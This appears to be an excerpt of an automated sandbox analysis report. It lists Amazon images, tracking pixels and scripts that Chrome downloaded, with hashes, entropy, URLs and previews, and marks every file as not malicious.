                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t....".................................................................!"1AQ.2aq...Rs.....Bbd.#35Sr..$%4ct.....................................................!1.2Bq."4A...Rr.............?..8..........................................TP.7.H.G@..T.'/q.*....|...I.r%.6o...#./q.1.M..z........W.2.DF..:O.o#..y.....j5...lY...rX........}_.....x.g.7......o#>./.O.h.....T9M.8C.`.b..m........-......P..x........$hp.*~.R.....S..v^..1{&.*..f..y..Q0.:....N.....h.=_""IX..................g.%....nO....s.Q.L..u.]..+.f!UUF..OP.:.=......@..0....vT~lv....|.......t#l\7.>5g...[.w....I.n.d.sy...G......&R.....g.....Y.;..e.8...}..o_..ru..........Qw......w:~..<.04.9u.T..o.......r.. ..V...^.......J..)=....23 ..$e."pA:..UK0..*...`.......'U.77...U......... .Z...t...%..;K.kYk..E..D~.........Y.,_z..|%...0.u...R...=z.G0....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):167
                                                                                                                                                                                                        Entropy (8bit):5.111279005374292
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:PouVIZxocJ+qlkGOcFSKPCxvZ60WaNXbZ6+3vLKXAhvGXI9F4:haxB0qlkGOqRGMJaNX96IvLKXAhdI
                                                                                                                                                                                                        MD5:C2076D9EB8087664920133620E56DA58
                                                                                                                                                                                                        SHA1:946566C37B1C622F0C9D5B603A3C2DD6DA393ADA
                                                                                                                                                                                                        SHA-256:075E99E9705C6718F9F73FD8214CB914207D723A8E4E5C763E11B72B9F820A8E
                                                                                                                                                                                                        SHA-512:66DBF81CBBA177BFA500037BA7D39913EE4828C6E6534FBC55D64258CFC3FA2D3C2C832F71823541EA3F86D5DF1363B1C998F24E8F385C996AF262139B17A979
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/S/apesafeframe/ape/sf/desktop/sf-1.50.495da7df.html
                                                                                                                                                                                                        Preview:<!DOCTYPE html><html><head><style>body{background-color:transparent;margin:0;padding:0}</style></head><body> <script src="sf-1.50.16755e0b.js" ></script></body></html>
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:XRRBVETR66S3T97BM5KF$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3DXRRBVETR66S3T97BM5KF%26m%3D1%26sc%3Dcsa%3Avl50%26vl50%3D52319%26pc%3D61669%26at%3D61669%26t%3D1723729136980%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DXRRBVETR66S3T97BM5KF%26aftb%3D1%26lob%3D1:61669
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 251x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):12744
                                                                                                                                                                                                        Entropy (8bit):7.944287956667978
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:t5Z40KA68tpsRsxDcDS1d0wNN9hwKjSAfgJxX7tnZvZvGu3j2cffB:tX3V11cDS1eYSAs9tnZtGu2YfB
                                                                                                                                                                                                        MD5:126677A1E30BB8C699ED38E2A31DD553
                                                                                                                                                                                                        SHA1:AB7C9A93F1CB7A52AD4CF6BCEFDE1D3D4CCD7447
                                                                                                                                                                                                        SHA-256:BA9A3C17D4A04894B425B272C0C222DD0572EB775E49CE0D389C9E4B3D6D757E
                                                                                                                                                                                                        SHA-512:304550B341E76A81416E49BDBE009E76D74B8785A80A6DF98D21AB1C22B1F5A9CEF9976BF389B38DBE30ABD4FC6B2C2A27880BEBE41B6553CC1FA0737AE9E79E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/51H4u4crV3L._AC_SY200_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........3................................................................`..}!?I.a........./.|.y...>rt...lM..a.....7..7|..........T.b.&.........l(^...l... .1.*.YgT.)....Lc.D...].......r...Q....L.q.M9.D...S.~.9.....c.W..5.Nkm5O..[.....9....6.....Ep. FlH.......X.-a..C^..9+.m&..YE2.z.e-!.L....K.VvZ......B..>..YCf/....LqI.O8.........Lx...;.YU~-.+..6.c|..:Dc.i....n.,..!kY...L.2h.)f..F..F.+.?...r$r.....o[X..D..;..u.Iaz.....b..c.v.3...IoM`..+...}...e+.veZ.J....AhT1........A.....K&uG....%r@.eq.t.4m...i.D...9....5'_bK....,z.:...U..GP..C.....t_..."..."R(....N3..`j_.Ut.I:.f..+..C..X....=p.a..<....V\......I.(..6...].)......@..G;iS..L..U<...p.iR.w.....1H.l.=I..&Q.+8A,...\.....PS......\.XQk.}.....k.S..W1.E.,...LO..t.. ......+.....W2..o..2@....6._2.1..=....\...T...$ZL...:.7.wb.I2.^..j+w..6...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):1912
                                                                                                                                                                                                        Entropy (8bit):7.400541112445304
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0r6yoN+OpJvnnnHQbxYQ4trmZSaxv3mSxxgh13:TKogGJvnnw/EefvzxxgL
                                                                                                                                                                                                        MD5:71F084F52C26055AB247D9991D6FB770
                                                                                                                                                                                                        SHA1:0CD211136707F4BAA90758253D3DE91A83249A78
                                                                                                                                                                                                        SHA-256:1761BA1BCD6D832F142709F2EF42D9C6D0CC7D451023ADF47AAB011B81692CFB
                                                                                                                                                                                                        SHA-512:854969BF044A30C6553B0226C007579B0D0304BD91596391675FB1CEA032BCBAF72C5E4E4A0D33B9BAC16CD6F260112A7CC684E821456F0AA9A2F5491532F920
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2024/img/Kitchen/XCM_CUTTLE_1715685_3745536_372x232_2X_en_AE._SY116_CB558011712_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..............................................................!1.."AQq.2aCbr..#34B....Rc...................................................!1A..Qa."2q................?..`...............................................................W].'m5.z..OrpU!..1...H......H.)''FY...F......?..".........L{E]........[..%.]P..%.~..6....n.km...jj.....Q!.?....4...6..u....O.M.... ./.P...c.:......U....c..H....*..c....|'.tc.+]-.:.O+..q...xt.'.....-..u?H.x......kU..?...._....Y.W...u..|I.(.b.-.Qo->r..x..E.O..*g..F.S..u...t.R.N2.ze<<<p...................^......W3T.Q...'.....K.o..K'.....b.{.i.....x.V..o...?..F...X..V....F..d[....Sm\.J.2.$..n2..R.f..`...o....-.....;P.F.^...PP.W.,%.E%.m<{..v......^....Fu..8..qNY.....V..ZP..-/.._..]..d..]...W....^..9.9...{c-.1...?.-c..CB..m.g..7.......x..5...R.K|g.Qo.5[.....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (665)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):276717
                                                                                                                                                                                                        Entropy (8bit):5.353438150363169
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:ZYIIAmk1Xaq/LTCz6PHaL5gYI5B6iSVMbN/vYSidNII:ZjP6LWY6bNXYSidNII
                                                                                                                                                                                                        MD5:3C66F4A874169140AE54522A79932AB8
                                                                                                                                                                                                        SHA1:BAE14697244A517EC3626011DB3B7D5842776A1A
                                                                                                                                                                                                        SHA-256:5B153D0DE899A912C5D4E38C154D2F24D972413566B6C45BB0C26C4B79C46949
                                                                                                                                                                                                        SHA-512:8FDE61B2CD52D7BD59C745AE11CD0F3B4226C2260B6CF0BB1FF979C8666CCC0DE76AB452ADC40C74A41822C26394AB8085A8EF10947E874998F36BA82657E3A8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:"https://m.media-amazon.com/images/I/11B2bsTfmvL._RC%7C11Y+5x+kkTL.js,51XFQXG4llL.js,11yKORv-GTL.js,11GgN1+C7hL.js,01+z+uIeJ-L.js,01VRMV3FBdL.js,21BJeD9yjcL.js,01meRT+S4PL.js,11aD5q6kNBL.js,11rRjDLdAVL.js,51LGf0aHP5L.js,11nAhXzgUmL.js,11UNP9ncXuL.js,113pYUOav3L.js,11uo7qXoO3L.js,01VhK3jZdbL.js,21eKR4hvwNL.js,01Q4S7ptbiL.js,51XuQjpKb8L.js,01JYHc2oIlL.js,31nfKXylf6L.js,01ktRCtOqKL.js,21xlsLy-PNL.js,11bEz2VIYrL.js,31o2NGTXThL.js,01rpauTep4L.js,315n+VmgJ3L.js,01tvglXfQOL.js,11jxZ9ouCoL.js,01fBsnBQx0L.js_.js?AUIClients/AmazonUI&88n9Ttiw"
                                                                                                                                                                                                        Preview:(function(a){var c=window.AmazonUIPageJS||window.P,d=c._namespace||c.attributeErrors,b=d?d("AmazonUIBaseJS@analytics","AmazonUI"):c;b.guardFatal?b.guardFatal(a)(b,window):b.execute(function(){a(b,window)})})(function(a,c,d){"use strict";a.register("a-analytics",function(){function b(b,f){var a=c&&c.ue&&c.ue.count;if(a&&b){var e="aui:"+b;1<arguments.length&&a(e,f);return a(e)}}var a=c&&c.ue&&c.ue.tag;return{increment:function(a,f){if(a){var c=b(a)||0;b(a,c+(f||1))}},count:b,logError:function(a,f,b){c.ueLogError&&.c.ueLogError({message:a},{logLevel:f,attribution:b})},tag:function(b){a&&b&&a("aui:"+b)}}});a.when("a-analytics").register("prv:a-cache-analytics",function(a){function b(a){var b=a.name.indexOf("AUIClients/AmazonUI");a=a.name[b+19];a=a===d||"\x26"===a||"#"===a;return-1!==b&&a}function e(b){a.tag(("script"===b.initiatorType?"js":"link"===b.initiatorType?"css":"unknown")+":"+(b.transferSize===d||b.decodedBodySize===d?"unknown":0===b.transferSize&&0<b.decodedBodySize?"cache":0<b.t
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:0RPFFN4XC9JAK0QN8ZQ4$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3D0RPFFN4XC9JAK0QN8ZQ4%26ic%3D2%26m%3D1%26sc%3Dcsa%3Alcp%26lcp%3D417%26pc%3D2692%26at%3D2692%26t%3D1723729119221%26csmtags%3Daui%3Asw%3Abrowser%3Aregister%3Asupported%26pty%3DFullPageAuthentication%26spty%3Dclaim%26pti%3Dundefined%26tid%3D0RPFFN4XC9JAK0QN8ZQ4%26aftb%3D1%26lob%3D1:2691
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 158x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):11445
                                                                                                                                                                                                        Entropy (8bit):7.958304680052471
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:AmTwuddiHpCPNEozfDrI0QHU1juvYC8PLzEOKRSoFrZpTPZJ3wFmAyjSvHOBzhMa:AYwudAHkKIDrhQ01iQC8P/EOc5FrTPZj
                                                                                                                                                                                                        MD5:EE3AFCA079A55031A80562D06C018554
                                                                                                                                                                                                        SHA1:21F7EA283680EBF5A66A550A011ED3400231AA0C
                                                                                                                                                                                                        SHA-256:D2EE6F6B0BF7B2E802A44964E6528CEC7EFD3B92F424D3092DCFC12F3E10AA43
                                                                                                                                                                                                        SHA-512:3DBBAA5EEFB69E98E761AD3947EA3CF6AEE301AE2FEA85683E70A7A13593318AFE77F3159245FAA6DE4308BA6ACA111484E2C20EA18EC86E8031E718F7E10B5B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/81bNucIe89L._AC_SY200_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!..1A."Q.a#2Ts......35Bqr....$Reu...46Ubt....D..................................................!.1..Aq2.."CQRSar...#B...3............?.{....3..I.J.Z..b..X#.V..i.lN..l..W..2.|....^!.U.....>.>;.a..I...W)hd.rB....u!...S..CJ.0@.\7.,k.v.#f?/..C.?..........8.".\.-.Ii=.x.'.&..J}a...........E.8.*ku]n.#MF..*.Vn.....Vs..m.RH.#xc.n....l......|g..2.|..........e_.R,6.9W..cS.t.Fhg.Q<.*.1G.t...me#.kX..*...M.....|._...."._/....jN.......jZHjK.M]ZR..3fdS.P..B..._`.HZh.....(.....YZ.. ....8...%.2...q6D...g..~....4.t.^.......~..Nc.-.Wr...2F|...Q...n.CJb....4.J.j....>...o....c....}t...../.....)..*b8.8.\..]&=.o.v....a0.0tC...x......U?.I....U?.I.\f'....%_.*=....:.T..]&3..:.UG.I.\f'....%?\.....L..]@?:..o.x.3z..z..u.........z.I.1..o......0..`|....Z....L.T
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:XRRBVETR66S3T97BM5KF$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3DXRRBVETR66S3T97BM5KF%26m%3D1%26sc%3Dcsa%3Avl90%26vl90%3D52319%26pc%3D61669%26at%3D61669%26t%3D1723729136980%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DXRRBVETR66S3T97BM5KF%26aftb%3D1%26lob%3D1:61669
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 244x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):19723
                                                                                                                                                                                                        Entropy (8bit):7.971435295662351
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:I/WiPpzP4AiXQX7dv/vuhFwgt3O6ByCq2C21yq2J3iT6pjjWjR9K89G7b:GVBzQwX7dvXuh3eZDH21yqwimpujPKj
                                                                                                                                                                                                        MD5:BD24737681B3A2F4539F01644F3C4E3B
                                                                                                                                                                                                        SHA1:744346B3F92B4B605186E9512A376C8D56EAF840
                                                                                                                                                                                                        SHA-256:D609EDC3CE69706EE2426C603D881E4F2BE8CE18BF7892816B0A1C4F8EA730B7
                                                                                                                                                                                                        SHA-512:DDDF597268CCEEE78F711825739F1F69CFC7B7343CDCFD47DA7E33624A2C621392CFD341FE9124BADD558FFA8B0D40071F1532AA592A5D70746E1302BD39E89F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5..................................................................$.I$.I$.9.Qi.0J.p.&+H..s......k...{.z..zt..i.i.T.L..f.o.|.Uu..i@......,e..g...R....[.S..4....DA.d.8.z..Q...........{...Y..=IG..J.....24..1w9W.6..$..f......g..z......s.F..m..j...6....D.....R..x..>n..#^yS..B.M.H..3..}..,...-N..&.;..i....9.`...%.D..x.2.@.........+j....F..]...Y...C>w..[.....V7..Ws..6-z...h.G...*=2.\.*..l..M^H>.{.v..y..n...u..6.h..+L.TXB.-.L.....b.Lo...:...~..2......p.krP.X..h,j....!...{.yf..-[.W.&hk QN."R.m.pajo.o$.f3.`:.......k.qx|z............T.y.2......+..1..}....m{.6c]..d.Y:.P_._ ;..l...V.kY.=1"....j.}..m......t/.r.........Wv.h..4.....(.....KDwhH.../.2EB.I<R....+./5....#.St....G...t0..w.-).3.I...*L....Ti.V.....e..".[B...D....h..v..2(9..y..Fx....ig..d....<...*.....@.%....o)..V....O.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:0RPFFN4XC9JAK0QN8ZQ4$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3D0RPFFN4XC9JAK0QN8ZQ4%26ic%3D2%26m%3D1%26sc%3Dcsa%3AstartVL%26pc%3D5149%26at%3D5149%26t%3D1723729121678%26csmtags%3DstartVL%26pty%3DFullPageAuthentication%26spty%3Dclaim%26pti%3Dundefined%26tid%3D0RPFFN4XC9JAK0QN8ZQ4%26aftb%3D1%26lob%3D1:5148
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.com/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:5BRA4F30RSYWBFPSHBR1$uedata=s:%2Fap%2Fuedata%3Fat%26v%3D0.295375.0%26id%3D5BRA4F30RSYWBFPSHBR1%26m%3D1%26sc%3Dcsa%3Alcp%26lcp%3D1282%26pc%3D6312%26at%3D6312%26t%3D1723729129582%26pty%3DAuthenticationPortal%26spty%3DSignInClaimCollect%26pti%3Dundefined%26tid%3D5BRA4F30RSYWBFPSHBR1%26aftb%3D1%26lob%3D0:6312
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3937
                                                                                                                                                                                                        Entropy (8bit):7.887415318033844
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:Tvqo6F/4yoQ8yusqe0lmYTkeZrhO5e57fd:04t3xWZe+M57F
                                                                                                                                                                                                        MD5:E0AD05F543E0263B26C17FCDC14DAEF8
                                                                                                                                                                                                        SHA1:30B2F74F88B949FA3F98A87030932892FA1770C4
                                                                                                                                                                                                        SHA-256:11D6C4678043319CC372E311C3BCC6B237BB79CA54714AD149535D3975B9FAF0
                                                                                                                                                                                                        SHA-512:4AB2AA1DC412ECFBB29CCC7749EC54492CB820B4B8AC09BC1D36D2B127913E0EF1B1A49A3E2267A79A033FD20DFEC47F020CD96F89FD2D273B0390389811C833
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..............................................................!1..AQq."ab..2B...#R.....$3CTdr.......................................................!12AQ...Bq#a..."..............?..)T...d.+5..Y........0....c.)^s.3......`.2...+5....mNV......AM...I.$......3..../.7.l}.%..RR.rv.\w.[n..U..r8...bx]..J..T.....qi..T.[..JR..)Bq@.V..G.!|...8.+Z...../+..*...(.JR.!..+F4+".J.2iA.m=....O9..O,...vM......m%......(...*o.8c7....1...Ig......HU.q..Vg...w..........B...c.7.75....W..*.C.OF_..5...m....d.%.P...,v..H..,..QI$...s..._l.f...$.{.8a..^...8.`.U.....wr....q......v.r....j.1j(.*....s........!..G.?.#.Z......?..J...$.cd...Lc..?.~M.W..H..O...Y.eSu.f......O..f...T.]..~......-...Y.I]x'.^....^.....!>..-..WF.P.SC.&.{Y.r..^6...z..R..#.vJQ........L...Fbe.v..w..e?.j\..9@r8*........$J..s....w......^=.D...[....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:XRRBVETR66S3T97BM5KF$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3DXRRBVETR66S3T97BM5KF%26m%3D1%26sc%3Dcsa%3Aatfsi%26atfsi%3D46061%26pc%3D61670%26at%3D61670%26t%3D1723729136981%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DXRRBVETR66S3T97BM5KF%26aftb%3D1%26lob%3D1:61670
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 440 x 440, 8-bit colormap, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):44079
                                                                                                                                                                                                        Entropy (8bit):7.988511593282199
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:khF3yBiXOS4bwh2ab8WPaMcDBJeLQD4bFtAHnNkzRKDDkYMz:kb3jPD2ab8obcDBILQD4zIn2M3q
                                                                                                                                                                                                        MD5:DCE71910C3BF8BA185ADFF839C67AFA6
                                                                                                                                                                                                        SHA1:10FA9B9A9BB6E3FFA70B7BE777904F7C652D1DF2
                                                                                                                                                                                                        SHA-256:8BCE0D94B33706766B7FD05DA9D61270AC353B4E830AEABD512DC6ACC91A09D1
                                                                                                                                                                                                        SHA-512:4F52E0F1EA325D8E01C6A9BDB8D1FC9A1D4CCD52F498185DB7D5FE5B90B0066754E2EFD69F644872AF6BFC8D12FB2720B6D4BE4E3A010C9333F69B678C98DCD3
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
